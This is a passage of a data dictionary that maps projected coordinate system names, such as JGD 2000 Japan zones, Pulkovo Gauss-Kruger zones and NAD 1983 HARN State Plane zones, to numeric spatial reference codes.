'JGD_2000_Japan_Zone_1': 2443, 'JGD_2000_Japan_Zone_2': 2444, 'JGD_2000_Japan_Zone_3': 2445, 'JGD_2000_Japan_Zone_4': 2446, 'JGD_2000_Japan_Zone_5': 2447, 'JGD_2000_Japan_Zone_6': 2448, 'JGD_2000_Japan_Zone_7': 2449, 'JGD_2000_Japan_Zone_8': 2450, 'JGD_2000_Japan_Zone_9': 2451, 'JGD_2000_Japan_Zone_10': 2452, 'JGD_2000_Japan_Zone_11': 2453, 'JGD_2000_Japan_Zone_12': 2454, 'JGD_2000_Japan_Zone_13': 2455, 'JGD_2000_Japan_Zone_14': 2456, 'JGD_2000_Japan_Zone_15': 2457, 'JGD_2000_Japan_Zone_16': 2458, 'JGD_2000_Japan_Zone_17': 2459, 'JGD_2000_Japan_Zone_18': 2460, 'JGD_2000_Japan_Zone_19': 2461, 'Albanian_1987_GK_Zone_4': 2462, 'Pulkovo_1942_3_Degree_GK_Zone_7': 2523, 'Pulkovo_1942_3_Degree_GK_Zone_8': 2524, 'Pulkovo_1942_3_Degree_GK_Zone_9': 2525, 'Pulkovo_1942_3_Degree_GK_Zone_10': 2526, 'Pulkovo_1942_3_Degree_GK_Zone_11': 2527, 'Pulkovo_1942_3_Degree_GK_Zone_12': 2528, 'Pulkovo_1942_3_Degree_GK_Zone_13': 2529, 'Pulkovo_1942_3_Degree_GK_Zone_14': 2530, 'Pulkovo_1942_3_Degree_GK_Zone_15': 2531, 'Pulkovo_1942_3_Degree_GK_Zone_16': 2532, 'Pulkovo_1942_3_Degree_GK_Zone_17': 2533, 'Pulkovo_1942_3_Degree_GK_Zone_18': 2534, 'Pulkovo_1942_3_Degree_GK_Zone_19': 2535, 'Pulkovo_1942_3_Degree_GK_Zone_20': 2536, 'Pulkovo_1942_3_Degree_GK_Zone_21': 2537, 'Pulkovo_1942_3_Degree_GK_Zone_22': 2538, 'Pulkovo_1942_3_Degree_GK_Zone_23': 2539, 'Pulkovo_1942_3_Degree_GK_Zone_24': 2540, 'Pulkovo_1942_3_Degree_GK_Zone_25': 2541, 'Pulkovo_1942_3_Degree_GK_Zone_26': 2542, 'Pulkovo_1942_3_Degree_GK_Zone_27': 2543, 'Pulkovo_1942_3_Degree_GK_Zone_28': 2544, 'Pulkovo_1942_3_Degree_GK_Zone_29': 2545, 'Pulkovo_1942_3_Degree_GK_Zone_30': 2546, 'Pulkovo_1942_3_Degree_GK_Zone_31': 2547, 'Pulkovo_1942_3_Degree_GK_Zone_32': 2548, 'Pulkovo_1942_3_Degree_GK_Zone_33': 2549, 'Samboja_UTM_Zone_50S': 2550, 'Pulkovo_1942_3_Degree_GK_Zone_34': 2551, 'Pulkovo_1942_3_Degree_GK_Zone_35': 2552, 'Pulkovo_1942_3_Degree_GK_Zone_36': 2553, 'Pulkovo_1942_3_Degree_GK_Zone_37': 2554, 'Pulkovo_1942_3_Degree_GK_Zone_38': 2555, 'Pulkovo_1942_3_Degree_GK_Zone_39': 2556, 'Pulkovo_1942_3_Degree_GK_Zone_40': 2557, 'Pulkovo_1942_3_Degree_GK_Zone_41': 2558, 'Pulkovo_1942_3_Degree_GK_Zone_42': 2559, 'Pulkovo_1942_3_Degree_GK_Zone_43': 2560, 'Pulkovo_1942_3_Degree_GK_Zone_44': 2561, 'Pulkovo_1942_3_Degree_GK_Zone_45': 2562, 'Pulkovo_1942_3_Degree_GK_Zone_46': 2563, 'Pulkovo_1942_3_Degree_GK_Zone_47': 2564, 'Pulkovo_1942_3_Degree_GK_Zone_48': 2565, 'Pulkovo_1942_3_Degree_GK_Zone_49': 2566, 'Pulkovo_1942_3_Degree_GK_Zone_50': 2567, 'Pulkovo_1942_3_Degree_GK_Zone_51': 2568, 'Pulkovo_1942_3_Degree_GK_Zone_52': 2569, 'Pulkovo_1942_3_Degree_GK_Zone_53': 2570, 'Pulkovo_1942_3_Degree_GK_Zone_54': 2571, 'Pulkovo_1942_3_Degree_GK_Zone_55': 2572, 'Pulkovo_1942_3_Degree_GK_Zone_56': 2573, 'Pulkovo_1942_3_Degree_GK_Zone_57': 2574, 'Pulkovo_1942_3_Degree_GK_Zone_58': 2575, 'Pulkovo_1942_3_Degree_GK_Zone_59': 2576, 'Pulkovo_1942_3_Degree_GK_Zone_60': 2577, 'Pulkovo_1942_3_Degree_GK_Zone_61': 2578, 'Pulkovo_1942_3_Degree_GK_Zone_62': 2579, 'Pulkovo_1942_3_Degree_GK_Zone_63': 2580, 'Pulkovo_1942_3_Degree_GK_Zone_64': 2581, 'Pulkovo_1942_3_Degree_GK_CM_21E': 2582, 'Pulkovo_1942_3_Degree_GK_CM_24E': 2583, 'Pulkovo_1942_3_Degree_GK_CM_27E': 2584, 'Pulkovo_1942_3_Degree_GK_CM_30E': 2585, 'Pulkovo_1942_3_Degree_GK_CM_33E': 2586, 'Pulkovo_1942_3_Degree_GK_CM_36E': 2587, 'Pulkovo_1942_3_Degree_GK_CM_39E': 2588, 'Pulkovo_1942_3_Degree_GK_CM_42E': 2589, 'Pulkovo_1942_3_Degree_GK_CM_45E': 2590, 'Pulkovo_1942_3_Degree_GK_CM_48E': 2591, 'Pulkovo_1942_3_Degree_GK_CM_51E': 2592, 'Pulkovo_1942_3_Degree_GK_CM_54E': 2593, 'Pulkovo_1942_3_Degree_GK_CM_57E': 2594, 'Pulkovo_1942_3_Degree_GK_CM_60E': 2595, 'Pulkovo_1942_3_Degree_GK_CM_63E': 2596, 'Pulkovo_1942_3_Degree_GK_CM_66E': 2597, 'Pulkovo_1942_3_Degree_GK_CM_69E': 2598, 'Pulkovo_1942_3_Degree_GK_CM_72E': 2599, 'Lietuvos_Koordinaciu_Sistema': 2600, 'Pulkovo_1942_3_Degree_GK_CM_75E': 2601, 'Pulkovo_1942_3_Degree_GK_CM_78E': 2602, 'Pulkovo_1942_3_Degree_GK_CM_81E': 2603, 'Pulkovo_1942_3_Degree_GK_CM_84E': 2604, 'Pulkovo_1942_3_Degree_GK_CM_87E': 2605, 'Pulkovo_1942_3_Degree_GK_CM_90E': 2606, 'Pulkovo_1942_3_Degree_GK_CM_93E': 2607, 'Pulkovo_1942_3_Degree_GK_CM_96E': 2608, 'Pulkovo_1942_3_Degree_GK_CM_99E': 2609, 'Pulkovo_1942_3_Degree_GK_CM_102E': 2610, 'Pulkovo_1942_3_Degree_GK_CM_105E': 2611, 'Pulkovo_1942_3_Degree_GK_CM_108E': 2612, 'Pulkovo_1942_3_Degree_GK_CM_111E': 2613, 'Pulkovo_1942_3_Degree_GK_CM_114E': 2614, 'Pulkovo_1942_3_Degree_GK_CM_117E': 2615, 'Pulkovo_1942_3_Degree_GK_CM_120E': 2616, 'Pulkovo_1942_3_Degree_GK_CM_123E': 2617, 'Pulkovo_1942_3_Degree_GK_CM_126E': 2618, 'Pulkovo_1942_3_Degree_GK_CM_129E': 2619, 'Pulkovo_1942_3_Degree_GK_CM_132E': 2620, 'Pulkovo_1942_3_Degree_GK_CM_135E': 2621, 'Pulkovo_1942_3_Degree_GK_CM_138E': 2622, 'Pulkovo_1942_3_Degree_GK_CM_141E': 2623, 'Pulkovo_1942_3_Degree_GK_CM_144E': 2624, 'Pulkovo_1942_3_Degree_GK_CM_147E': 2625, 'Pulkovo_1942_3_Degree_GK_CM_150E': 2626, 'Pulkovo_1942_3_Degree_GK_CM_153E': 2627, 'Pulkovo_1942_3_Degree_GK_CM_156E': 2628, 'Pulkovo_1942_3_Degree_GK_CM_159E': 2629, 'Pulkovo_1942_3_Degree_GK_CM_162E': 2630, 'Pulkovo_1942_3_Degree_GK_CM_165E': 2631, 'Pulkovo_1942_3_Degree_GK_CM_168E': 2632, 'Pulkovo_1942_3_Degree_GK_CM_171E': 2633, 'Pulkovo_1942_3_Degree_GK_CM_174E': 2634, 'Pulkovo_1942_3_Degree_GK_CM_177E': 2635, 'Pulkovo_1942_3_Degree_GK_CM_180E': 2636, 'Pulkovo_1942_3_Degree_GK_CM_177W': 2637, 'Pulkovo_1942_3_Degree_GK_CM_174W': 2638, 'Pulkovo_1942_3_Degree_GK_CM_171W': 2639, 'Pulkovo_1942_3_Degree_GK_CM_168W': 2640, 'Pulkovo_1995_3_Degree_GK_Zone_7': 2641, 'Pulkovo_1995_3_Degree_GK_Zone_8': 2642, 'Pulkovo_1995_3_Degree_GK_Zone_9': 2643, 'Pulkovo_1995_3_Degree_GK_Zone_10': 2644, 'Pulkovo_1995_3_Degree_GK_Zone_11': 2645, 'Pulkovo_1995_3_Degree_GK_Zone_12': 2646, 'Pulkovo_1995_3_Degree_GK_Zone_13': 2647, 'Pulkovo_1995_3_Degree_GK_Zone_14': 2648, 'Pulkovo_1995_3_Degree_GK_Zone_15': 2649, 'Pulkovo_1995_3_Degree_GK_Zone_16': 2650, 'Pulkovo_1995_3_Degree_GK_Zone_17': 2651, 'Pulkovo_1995_3_Degree_GK_Zone_18': 2652, 'Pulkovo_1995_3_Degree_GK_Zone_19': 2653, 'Pulkovo_1995_3_Degree_GK_Zone_20': 2654, 'Pulkovo_1995_3_Degree_GK_Zone_21': 2655, 'Pulkovo_1995_3_Degree_GK_Zone_22': 2656, 'Pulkovo_1995_3_Degree_GK_Zone_23': 2657, 'Pulkovo_1995_3_Degree_GK_Zone_24': 2658, 'Pulkovo_1995_3_Degree_GK_Zone_25': 2659, 'Pulkovo_1995_3_Degree_GK_Zone_26': 2660, 'Pulkovo_1995_3_Degree_GK_Zone_27': 2661, 'Pulkovo_1995_3_Degree_GK_Zone_28': 2662, 'Pulkovo_1995_3_Degree_GK_Zone_29': 2663, 'Pulkovo_1995_3_Degree_GK_Zone_30': 2664, 'Pulkovo_1995_3_Degree_GK_Zone_31': 2665, 'Pulkovo_1995_3_Degree_GK_Zone_32': 2666, 'Pulkovo_1995_3_Degree_GK_Zone_33': 2667, 'Pulkovo_1995_3_Degree_GK_Zone_34': 2668, 'Pulkovo_1995_3_Degree_GK_Zone_35': 2669, 'Pulkovo_1995_3_Degree_GK_Zone_36': 2670, 'Pulkovo_1995_3_Degree_GK_Zone_37': 2671, 'Pulkovo_1995_3_Degree_GK_Zone_38': 2672, 'Pulkovo_1995_3_Degree_GK_Zone_39': 2673, 'Pulkovo_1995_3_Degree_GK_Zone_40': 2674, 'Pulkovo_1995_3_Degree_GK_Zone_41': 2675, 'Pulkovo_1995_3_Degree_GK_Zone_42': 2676, 'Pulkovo_1995_3_Degree_GK_Zone_43': 2677, 'Pulkovo_1995_3_Degree_GK_Zone_44': 2678, 'Pulkovo_1995_3_Degree_GK_Zone_45': 2679, 'Pulkovo_1995_3_Degree_GK_Zone_46': 2680, 'Pulkovo_1995_3_Degree_GK_Zone_47': 2681, 'Pulkovo_1995_3_Degree_GK_Zone_48': 2682, 'Pulkovo_1995_3_Degree_GK_Zone_49': 2683, 'Pulkovo_1995_3_Degree_GK_Zone_50': 2684, 'Pulkovo_1995_3_Degree_GK_Zone_51': 2685, 'Pulkovo_1995_3_Degree_GK_Zone_52': 2686, 'Pulkovo_1995_3_Degree_GK_Zone_53': 2687, 'Pulkovo_1995_3_Degree_GK_Zone_54': 2688, 'Pulkovo_1995_3_Degree_GK_Zone_55': 2689, 'Pulkovo_1995_3_Degree_GK_Zone_56': 2690, 'Pulkovo_1995_3_Degree_GK_Zone_57': 2691, 'Pulkovo_1995_3_Degree_GK_Zone_58': 2692, 'Pulkovo_1995_3_Degree_GK_Zone_59': 2693, 'Pulkovo_1995_3_Degree_GK_Zone_60': 2694, 'Pulkovo_1995_3_Degree_GK_Zone_61': 2695, 'Pulkovo_1995_3_Degree_GK_Zone_62': 2696, 'Pulkovo_1995_3_Degree_GK_Zone_63': 2697, 'Pulkovo_1995_3_Degree_GK_Zone_64': 2698, 'Pulkovo_1995_3_Degree_GK_CM_21E': 2699, 'Pulkovo_1995_3_Degree_GK_CM_24E': 2700, 'Pulkovo_1995_3_Degree_GK_CM_27E': 2701, 'Pulkovo_1995_3_Degree_GK_CM_30E': 2702, 'Pulkovo_1995_3_Degree_GK_CM_33E': 2703, 'Pulkovo_1995_3_Degree_GK_CM_36E': 2704, 'Pulkovo_1995_3_Degree_GK_CM_39E': 2705, 'Pulkovo_1995_3_Degree_GK_CM_42E': 2706, 'Pulkovo_1995_3_Degree_GK_CM_45E': 2707, 'Pulkovo_1995_3_Degree_GK_CM_48E': 2708, 'Pulkovo_1995_3_Degree_GK_CM_51E': 2709, 'Pulkovo_1995_3_Degree_GK_CM_54E': 2710, 'Pulkovo_1995_3_Degree_GK_CM_57E': 2711, 'Pulkovo_1995_3_Degree_GK_CM_60E': 2712, 'Pulkovo_1995_3_Degree_GK_CM_63E': 2713, 'Pulkovo_1995_3_Degree_GK_CM_66E': 2714, 'Pulkovo_1995_3_Degree_GK_CM_69E': 2715, 'Pulkovo_1995_3_Degree_GK_CM_72E': 2716, 'Pulkovo_1995_3_Degree_GK_CM_75E': 2717, 'Pulkovo_1995_3_Degree_GK_CM_78E': 2718, 'Pulkovo_1995_3_Degree_GK_CM_81E': 2719, 'Pulkovo_1995_3_Degree_GK_CM_84E': 2720, 'Pulkovo_1995_3_Degree_GK_CM_87E': 2721, 'Pulkovo_1995_3_Degree_GK_CM_90E': 2722, 'Pulkovo_1995_3_Degree_GK_CM_93E': 2723, 'Pulkovo_1995_3_Degree_GK_CM_96E': 2724, 'Pulkovo_1995_3_Degree_GK_CM_99E': 2725, 'Pulkovo_1995_3_Degree_GK_CM_102E': 2726, 'Pulkovo_1995_3_Degree_GK_CM_105E': 2727, 'Pulkovo_1995_3_Degree_GK_CM_108E': 2728, 'Pulkovo_1995_3_Degree_GK_CM_111E': 2729, 'Pulkovo_1995_3_Degree_GK_CM_114E': 2730, 'Pulkovo_1995_3_Degree_GK_CM_117E': 2731, 'Pulkovo_1995_3_Degree_GK_CM_120E': 2732, 'Pulkovo_1995_3_Degree_GK_CM_123E': 2733, 'Pulkovo_1995_3_Degree_GK_CM_126E': 2734, 'Pulkovo_1995_3_Degree_GK_CM_129E': 2735, 'Tete_UTM_Zone_36S': 2736, 'Tete_UTM_Zone_37S': 2737, 'Pulkovo_1995_3_Degree_GK_CM_132E': 2738, 'Pulkovo_1995_3_Degree_GK_CM_135E': 2739, 'Pulkovo_1995_3_Degree_GK_CM_138E': 2740, 'Pulkovo_1995_3_Degree_GK_CM_141E': 2741, 'Pulkovo_1995_3_Degree_GK_CM_144E': 2742, 'Pulkovo_1995_3_Degree_GK_CM_147E': 2743, 'Pulkovo_1995_3_Degree_GK_CM_150E': 2744, 'Pulkovo_1995_3_Degree_GK_CM_153E': 2745, 'Pulkovo_1995_3_Degree_GK_CM_156E': 2746, 'Pulkovo_1995_3_Degree_GK_CM_159E': 2747, 'Pulkovo_1995_3_Degree_GK_CM_162E': 2748, 'Pulkovo_1995_3_Degree_GK_CM_165E': 2749, 'Pulkovo_1995_3_Degree_GK_CM_168E': 2750, 'Pulkovo_1995_3_Degree_GK_CM_171E': 2751, 'Pulkovo_1995_3_Degree_GK_CM_174E': 2752, 'Pulkovo_1995_3_Degree_GK_CM_177E': 2753, 'Pulkovo_1995_3_Degree_GK_CM_180E': 2754, 'Pulkovo_1995_3_Degree_GK_CM_177W': 2755, 'Pulkovo_1995_3_Degree_GK_CM_174W': 2756, 'Pulkovo_1995_3_Degree_GK_CM_171W': 2757, 'Pulkovo_1995_3_Degree_GK_CM_168W': 2758, 'NAD_1983_HARN_StatePlane_Alabama_East_FIPS_0101': 2759, 'NAD_1983_HARN_StatePlane_Alabama_West_FIPS_0102': 2760, 'NAD_1983_HARN_StatePlane_Arizona_East_FIPS_0201': 2761, 'NAD_1983_HARN_StatePlane_Arizona_Central_FIPS_0202': 2762, 'NAD_1983_HARN_StatePlane_Arizona_West_FIPS_0203': 2763, 'NAD_1983_HARN_StatePlane_Arkansas_North_FIPS_0301': 2764, 'NAD_1983_HARN_StatePlane_Arkansas_South_FIPS_0302': 2765, 'NAD_1983_HARN_StatePlane_California_I_FIPS_0401': 2766, 'NAD_1983_HARN_StatePlane_California_II_FIPS_0402': 2767, 'NAD_1983_HARN_StatePlane_California_III_FIPS_0403': 2768, 'NAD_1983_HARN_StatePlane_California_IV_FIPS_0404': 2769, 'NAD_1983_HARN_StatePlane_California_V_FIPS_0405': 2770, 'NAD_1983_HARN_StatePlane_California_VI_FIPS_0406': 2771, 'NAD_1983_HARN_StatePlane_Colorado_North_FIPS_0501': 2772, 'NAD_1983_HARN_StatePlane_Colorado_Central_FIPS_0502': 2773, 'NAD_1983_HARN_StatePlane_Colorado_South_FIPS_0503': 2774, 'NAD_1983_HARN_StatePlane_Connecticut_FIPS_0600': 2775, 'NAD_1983_HARN_StatePlane_Delaware_FIPS_0700': 2776, 'NAD_1983_HARN_StatePlane_Florida_East_FIPS_0901': 2777, 'NAD_1983_HARN_StatePlane_Florida_West_FIPS_0902': 2778, 'NAD_1983_HARN_StatePlane_Florida_North_FIPS_0903': 2779, 'NAD_1983_HARN_StatePlane_Georgia_East_FIPS_1001': 2780, 'NAD_1983_HARN_StatePlane_Georgia_West_FIPS_1002': 2781, 'NAD_1983_HARN_StatePlane_Hawaii_1_FIPS_5101': 2782, 'NAD_1983_HARN_StatePlane_Hawaii_2_FIPS_5102': 2783, 'NAD_1983_HARN_StatePlane_Hawaii_3_FIPS_5103': 2784, 'NAD_1983_HARN_StatePlane_Hawaii_4_FIPS_5104': 2785, 'NAD_1983_HARN_StatePlane_Hawaii_5_FIPS_5105': 2786, 'NAD_1983_HARN_StatePlane_Idaho_East_FIPS_1101': 2787, 'NAD_1983_HARN_StatePlane_Idaho_Central_FIPS_1102': 2788, 'NAD_1983_HARN_StatePlane_Idaho_West_FIPS_1103': 2789, 'NAD_1983_HARN_StatePlane_Illinois_East_FIPS_1201': 2790, 'NAD_1983_HARN_StatePlane_Illinois_West_FIPS_1202': 2791, 'NAD_1983_HARN_StatePlane_Indiana_East_FIPS_1301': 2792, 'NAD_1983_HARN_StatePlane_Indiana_West_FIPS_1302': 2793, 'NAD_1983_HARN_StatePlane_Iowa_North_FIPS_1401': 2794, 'NAD_1983_HARN_StatePlane_Iowa_South_FIPS_1402': 2795, 'NAD_1983_HARN_StatePlane_Kansas_North_FIPS_1501': 2796, 'NAD_1983_HARN_StatePlane_Kansas_South_FIPS_1502': 2797, 'NAD_1983_HARN_StatePlane_Kentucky_North_FIPS_1601': 2798, 'NAD_1983_HARN_StatePlane_Kentucky_South_FIPS_1602': 2799, 'NAD_1983_HARN_StatePlane_Louisiana_North_FIPS_1701': 2800, 'NAD_1983_HARN_StatePlane_Louisiana_South_FIPS_1702': 2801, 'NAD_1983_HARN_StatePlane_Maine_East_FIPS_1801': 2802, 'NAD_1983_HARN_StatePlane_Maine_West_FIPS_1802': 2803, 'NAD_1983_HARN_StatePlane_Maryland_FIPS_1900': 2804, 'NAD_1983_HARN_StatePlane_Massachusetts_Mainland_FIPS_2001': 2805, 'NAD_1983_HARN_StatePlane_Massachusetts_Island_FIPS_2002': 2806, 'NAD_1983_HARN_StatePlane_Michigan_North_FIPS_2111': 2807, 'NAD_1983_HARN_StatePlane_Michigan_Central_FIPS_2112': 2808, 'NAD_1983_HARN_StatePlane_Michigan_South_FIPS_2113': 2809, 'NAD_1983_HARN_StatePlane_Minnesota_North_FIPS_2201': 2810, 'NAD_1983_HARN_StatePlane_Minnesota_Central_FIPS_2202': 2811, 'NAD_1983_HARN_StatePlane_Minnesota_South_FIPS_2203': 2812, 'NAD_1983_HARN_StatePlane_Mississippi_East_FIPS_2301': 2813, 'NAD_1983_HARN_StatePlane_Mississippi_West_FIPS_2302': 2814, 'NAD_1983_HARN_StatePlane_Missouri_East_FIPS_2401': 2815, 'NAD_1983_HARN_StatePlane_Missouri_Central_FIPS_2402': 2816, 'NAD_1983_HARN_StatePlane_Missouri_West_FIPS_2403': 2817, 'NAD_1983_HARN_StatePlane_Montana_FIPS_2500': 2818, 'NAD_1983_HARN_StatePlane_Nebraska_FIPS_2600': 2819, 'NAD_1983_HARN_StatePlane_Nevada_East_FIPS_2701': 2820, 'NAD_1983_HARN_StatePlane_Nevada_Central_FIPS_2702': 2821, 'NAD_1983_HARN_StatePlane_Nevada_West_FIPS_2703': 2822, 'NAD_1983_HARN_StatePlane_New_Hampshire_FIPS_2800': 2823, 'NAD_1983_HARN_StatePlane_New_Jersey_FIPS_2900': 2824, 'NAD_1983_HARN_StatePlane_New_Mexico_East_FIPS_3001': 2825, 'NAD_1983_HARN_StatePlane_New_Mexico_Central_FIPS_3002': 2826, 'NAD_1983_HARN_StatePlane_New_Mexico_West_FIPS_3003': 2827, 'NAD_1983_HARN_StatePlane_New_York_East_FIPS_3101': 2828, 'NAD_1983_HARN_StatePlane_New_York_Central_FIPS_3102': 2829, 'NAD_1983_HARN_StatePlane_New_York_West_FIPS_3103': 2830, 'NAD_1983_HARN_StatePlane_New_York_Long_Island_FIPS_3104': 2831, 'NAD_1983_HARN_StatePlane_North_Dakota_North_FIPS_3301': 2832, 'NAD_1983_HARN_StatePlane_North_Dakota_South_FIPS_3302': 2833, 'NAD_1983_HARN_StatePlane_Ohio_North_FIPS_3401': 2834, 'NAD_1983_HARN_StatePlane_Ohio_South_FIPS_3402': 2835, 'NAD_1983_HARN_StatePlane_Oklahoma_North_FIPS_3501': 2836, 'NAD_1983_HARN_StatePlane_Oklahoma_South_FIPS_3502': 2837, 'NAD_1983_HARN_StatePlane_Oregon_North_FIPS_3601': 2838, 'NAD_1983_HARN_StatePlane_Oregon_South_FIPS_3602': 2839, 'NAD_1983_HARN_StatePlane_Rhode_Island_FIPS_3800': 2840, 'NAD_1983_HARN_StatePlane_South_Dakota_North_FIPS_4001': 2841, 'NAD_1983_HARN_StatePlane_South_Dakota_South_FIPS_4002': 2842, 'NAD_1983_HARN_StatePlane_Tennessee_FIPS_4100': 2843, 'NAD_1983_HARN_StatePlane_Texas_North_FIPS_4201': 2844, 'NAD_1983_HARN_StatePlane_Texas_North_Central_FIPS_4202': 2845, 'NAD_1983_HARN_StatePlane_Texas_Central_FIPS_4203': 2846, 'NAD_1983_HARN_StatePlane_Texas_South_Central_FIPS_4204': 2847, 'NAD_1983_HARN_StatePlane_Texas_South_FIPS_4205': 2848, 'NAD_1983_HARN_StatePlane_Utah_North_FIPS_4301': 2849, 'NAD_1983_HARN_StatePlane_Utah_Central_FIPS_4302': 2850, 'NAD_1983_HARN_StatePlane_Utah_South_FIPS_4303': 2851, 'NAD_1983_HARN_StatePlane_Vermont_FIPS_4400': 2852, 'NAD_1983_HARN_StatePlane_Virginia_North_FIPS_4501': 2853, 'NAD_1983_HARN_StatePlane_Virginia_South_FIPS_4502': 2854, 'NAD_1983_HARN_StatePlane_Washington_North_FIPS_4601': 2855, 'NAD_1983_HARN_StatePlane_Washington_South_FIPS_4602': 2856, 'NAD_1983_HARN_StatePlane_West_Virginia_North_FIPS_4701': 2857, 'NAD_1983_HARN_StatePlane_West_Virginia_South_FIPS_4702': 2858, 'NAD_1983_HARN_StatePlane_Wisconsin_North_FIPS_4801': 2859, 'NAD_1983_HARN_StatePlane_Wisconsin_Central_FIPS_4802': 2860, 'NAD_1983_HARN_StatePlane_Wisconsin_South_FIPS_4803': 2861, 'NAD_1983_HARN_StatePlane_Wyoming_East_FIPS_4901': 2862, 'NAD_1983_HARN_StatePlane_Wyoming_East_Central_FIPS_4902': 2863, 'NAD_1983_HARN_StatePlane_Wyoming_West_Central_FIPS_4903': 2864, 'NAD_1983_HARN_StatePlane_Wyoming_West_FIPS_4904': 2865, 'NAD_1983_HARN_StatePlane_Puerto_Rico_Virgin_Islands_FIPS_5200': 2866, 'NAD_1983_HARN_StatePlane_Arizona_East_FIPS_0201_Feet_Intl': 2867, 'NAD_1983_HARN_StatePlane_Arizona_Central_FIPS_0202_Feet_Intl': 2868, 'NAD_1983_HARN_StatePlane_Arizona_West_FIPS_0203_Feet_Intl': 2869, 'NAD_1983_HARN_StatePlane_California_I_FIPS_0401_Feet': 2870, 'NAD_1983_HARN_StatePlane_California_II_FIPS_0402_Feet': 2871, 'NAD_1983_HARN_StatePlane_California_III_FIPS_0403_Feet': 2872, 'NAD_1983_HARN_StatePlane_California_IV_FIPS_0404_Feet': 2873, 'NAD_1983_HARN_StatePlane_California_V_FIPS_0405_Feet': 2874, 'NAD_1983_HARN_StatePlane_California_VI_FIPS_0406_Feet': 2875, 'NAD_1983_HARN_StatePlane_Colorado_North_FIPS_0501_Feet': 2876, 'NAD_1983_HARN_StatePlane_Colorado_Central_FIPS_0502_Feet': 2877, 'NAD_1983_HARN_StatePlane_Colorado_South_FIPS_0503_Feet': 2878, 'NAD_1983_HARN_StatePlane_Connecticut_FIPS_0600_Feet': 2879, 'NAD_1983_HARN_StatePlane_Delaware_FIPS_0700_Feet': 2880, 'NAD_1983_HARN_StatePlane_Florida_East_FIPS_0901_Feet': 2881, 'NAD_1983_HARN_StatePlane_Florida_West_FIPS_0902_Feet': 2882, 'NAD_1983_HARN_StatePlane_Florida_North_FIPS_0903_Feet': 2883, 'NAD_1983_HARN_StatePlane_Georgia_East_FIPS_1001_Feet': 2884, 'NAD_1983_HARN_StatePlane_Georgia_West_FIPS_1002_Feet': 2885, 'NAD_1983_HARN_StatePlane_Idaho_East_FIPS_1101_Feet': 2886, 'NAD_1983_HARN_StatePlane_Idaho_Central_FIPS_1102_Feet': 2887, 'NAD_1983_HARN_StatePlane_Idaho_West_FIPS_1103_Feet': 2888, 'NAD_1983_HARN_StatePlane_Kentucky_North_FIPS_1601_Feet': 2891, 'NAD_1983_HARN_StatePlane_Kentucky_South_FIPS_1602_Feet': 2892, 'NAD_1983_HARN_StatePlane_Maryland_FIPS_1900_Feet': 2893, 'NAD_1983_HARN_StatePlane_Massachusetts_Mainland_FIPS_2001_Feet': 2894, 'NAD_1983_HARN_StatePlane_Massachusetts_Island_FIPS_2002_Feet': 2895, 'NAD_1983_HARN_StatePlane_Michigan_North_FIPS_2111_Feet_Intl': 2896, 'NAD_1983_HARN_StatePlane_Michigan_Central_FIPS_2112_Feet_Intl': 2897, 'NAD_1983_HARN_StatePlane_Michigan_South_FIPS_2113_Feet_Intl': 2898, 'NAD_1983_HARN_StatePlane_Mississippi_East_FIPS_2301_Feet': 2899, 'NAD_1983_HARN_StatePlane_Mississippi_West_FIPS_2302_Feet': 2900, 'NAD_1983_HARN_StatePlane_Montana_FIPS_2500_Feet_Intl': 2901, 'NAD_1983_HARN_StatePlane_New_Mexico_East_FIPS_3001_Feet': 2902, 'NAD_1983_HARN_StatePlane_New_Mexico_Central_FIPS_3002_Feet': 2903, 'NAD_1983_HARN_StatePlane_New_Mexico_West_FIPS_3003_Feet': 2904, 'NAD_1983_HARN_StatePlane_New_York_East_FIPS_3101_Feet': 2905, 'NAD_1983_HARN_StatePlane_New_York_Central_FIPS_3102_Feet': 2906, 'NAD_1983_HARN_StatePlane_New_York_West_FIPS_3103_Feet': 2907, 'NAD_1983_HARN_StatePlane_New_York_Long_Island_FIPS_3104_Feet': 2908, 'NAD_1983_HARN_StatePlane_North_Dakota_North_FIPS_3301_Feet_Intl': 2909, 'NAD_1983_HARN_StatePlane_North_Dakota_South_FIPS_3302_Feet_Intl': 2910, 'NAD_1983_HARN_StatePlane_Oklahoma_North_FIPS_3501_Feet': 2911, 'NAD_1983_HARN_StatePlane_Oklahoma_South_FIPS_3502_Feet': 2912, 'NAD_1983_HARN_StatePlane_Oregon_North_FIPS_3601_Feet_Intl': 2913, 'NAD_1983_HARN_StatePlane_Oregon_South_FIPS_3602_Feet_Intl': 2914, 'NAD_1983_HARN_StatePlane_Tennessee_FIPS_4100_Feet': 2915, 'NAD_1983_HARN_StatePlane_Texas_North_FIPS_4201_Feet': 2916, 'NAD_1983_HARN_StatePlane_Texas_North_Central_FIPS_4202_Feet': 2917, 'NAD_1983_HARN_StatePlane_Texas_Central_FIPS_4203_Feet': 2918, 'NAD_1983_HARN_StatePlane_Texas_South_Central_FIPS_4204_Feet': 2919, 'NAD_1983_HARN_StatePlane_Texas_South_FIPS_4205_Feet': 2920, 'NAD_1983_HARN_StatePlane_Utah_North_FIPS_4301_Feet_Intl': 2921, 'NAD_1983_HARN_StatePlane_Utah_Central_FIPS_4302_Feet_Intl': 2922, 'NAD_1983_HARN_StatePlane_Utah_South_FIPS_4303_Feet_Intl': 2923, 'NAD_1983_HARN_StatePlane_Virginia_North_FIPS_4501_Feet': 2924, 'NAD_1983_HARN_StatePlane_Virginia_South_FIPS_4502_Feet': 2925, 'NAD_1983_HARN_StatePlane_Washington_North_FIPS_4601_Feet': 2926, 'NAD_1983_HARN_StatePlane_Washington_South_FIPS_4602_Feet': 2927, 'NAD_1983_HARN_StatePlane_Wisconsin_North_FIPS_4801_Feet': 2928, 'NAD_1983_HARN_StatePlane_Wisconsin_Central_FIPS_4802_Feet': 2929, 'NAD_1983_HARN_StatePlane_Wisconsin_South_FIPS_4803_Feet': 2930, 'Beduaram_TM_13_NE': 2931, 'QND_1995_Qatar_National_Grid': 2932, 'Gunung_Segara_UTM_Zone_50S': 2933, 'Pulkovo_1942_CS63_Zone_A1': 2935, 'Pulkovo_1942_CS63_Zone_A2': 2936, 'Pulkovo_1942_CS63_Zone_A3': 2937, 'Pulkovo_1942_CS63_Zone_A4': 2938, 'Pulkovo_1942_CS63_Zone_K2': 2939, 'Pulkovo_1942_CS63_Zone_K3': 2940, 'Pulkovo_1942_CS63_Zone_K4': 2941, 'Porto_Santo_1936_UTM_Zone_28N': 2942, 'Selvagem_Grande_1938_UTM_Zone_28N': 2943, 'NAD_1983_CSRS_MTM_2_SCoPQ': 2944, 'NAD_1983_CSRS_MTM_3': 2945, 'NAD_1983_CSRS_MTM_4': 2946, 'NAD_1983_CSRS_MTM_5': 2947, 